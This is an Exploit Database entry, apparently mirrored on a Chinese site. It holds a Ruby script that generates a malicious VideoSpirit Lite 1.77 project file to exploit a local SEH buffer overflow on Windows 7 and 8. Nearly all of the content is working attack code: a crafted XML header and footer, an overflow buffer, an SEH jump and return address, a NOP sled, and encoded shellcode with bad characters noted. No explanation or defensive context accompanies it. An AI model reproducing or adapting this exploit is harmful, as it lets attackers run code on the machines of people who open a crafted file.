VideoSpirit Lite 1.77 – Local Buffer Overflow (SEH)

• Exploit Database
• 12 阅读

• 作者： metacom
  日期： 2013-11-12
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/29548/

• #!/usr/bin/ruby
  #Vendor: http://www.verytools.com/
  #Software link: http://www.verytools.com/videospirit/download.html
  print '''
  
  		VideoSpirit Lite 1.77 Seh Buffer Overflow
  		Version: Lite 1.77
  		Date found: 11.11.2013
  		Exploit Author: metacom
  		Tested on: Win7-Win8-EN
  '''
  sleep(3)
  head=("\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20"+
  "\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"+
  "\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20"+
  "\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A"+
  "\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22"+
  "\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"+
  "\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76"+
  "\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B"+
  "\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B"+
  "\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72"+
  "\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A"+
  "\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79"+
  "\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73"+
  "\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C"+
  "\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30"+
  "\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20"+
  "\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73"+
  "\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D"+
  "\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20"+
  "\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A"+
  "\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32"+
  "\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C"+
  "\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76"+
  "\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20"+
  "\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36"+
  "\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B"+
  "\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20"+
  "\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31"+
  "\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D"+
  "\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22")
  buffer="\x41" * 104
  buffer+="\xeb\x0c\xff\xff" # jump
  buffer+=[0x1008667f].pack('V')# 0x1008667f
  buffer+="\x90" * 80 # landing zone
  buffer+=("\xb8\xb8\xd3\x62\x62\xd9\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"+
  "\x33\x83\xea\xfc\x31\x42\x0e\x03\xfa\xdd\x80\x97\x06\x09\xcd"+
  "\x58\xf6\xca\xae\xd1\x13\xfb\xfc\x86\x50\xae\x30\xcc\x34\x43"+
  "\xba\x80\xac\xd0\xce\x0c\xc3\x51\x64\x6b\xea\x62\x48\xb3\xa0"+
  "\xa1\xca\x4f\xba\xf5\x2c\x71\x75\x08\x2c\xb6\x6b\xe3\x7c\x6f"+
  "\xe0\x56\x91\x04\xb4\x6a\x90\xca\xb3\xd3\xea\x6f\x03\xa7\x40"+ # Bad Characters
  "\x71\x53\x18\xde\x39\x4b\x12\xb8\x99\x6a\xf7\xda\xe6\x25\x7c"+ # \x00\x0a\x0d\x1a\x21\x22\x26
  "\x28\x9c\xb4\x54\x60\x5d\x87\x98\x2f\x60\x28\x15\x31\xa4\x8e"+
  "\xc6\x44\xde\xed\x7b\x5f\x25\x8c\xa7\xea\xb8\x36\x23\x4c\x19"+
  "\xc7\xe0\x0b\xea\xcb\x4d\x5f\xb4\xcf\x50\x8c\xce\xeb\xd9\x33"+
  "\x01\x7a\x99\x17\x85\x27\x79\x39\x9c\x8d\x2c\x46\xfe\x69\x90"+
  "\xe2\x74\x9b\xc5\x95\xd6\xf1\x18\x17\x6d\xbc\x1b\x27\x6e\xee"+
  "\x73\x16\xe5\x61\x03\xa7\x2c\xc6\xfb\xed\x6d\x6e\x94\xab\xe7"+
  "\x33\xf9\x4b\xd2\x77\x04\xc8\xd7\x07\xf3\xd0\x9d\x02\xbf\x56"+
  "\x4d\x7e\xd0\x32\x71\x2d\xd1\x16\x12\xb0\x41\xfa\xfb\x57\xe2"+
  "\x99\x03")
  buffer+="\xCC" * 4500
  footer=("\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65"+
  "\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D"+
  "\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76"+
  "\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20"+
  "\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20"+
  "\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22"+
  "\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32"+
  "\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20"+
  "\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20"+
  "\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E")
  off= head + buffer + footer
  print "\t\t[+]Creating Exploit File...\n"
  sleep(1)
  begin
  File.open("Exploit.visprj","wb") do |f| 
  f.write off
  f.close
  print "\t\t[+]File Exploit.visprj create successfully.\n"
  sleep(1)
  end
  rescue
  print "**[-]Error: #{$!}\n"
  exit(0)
  end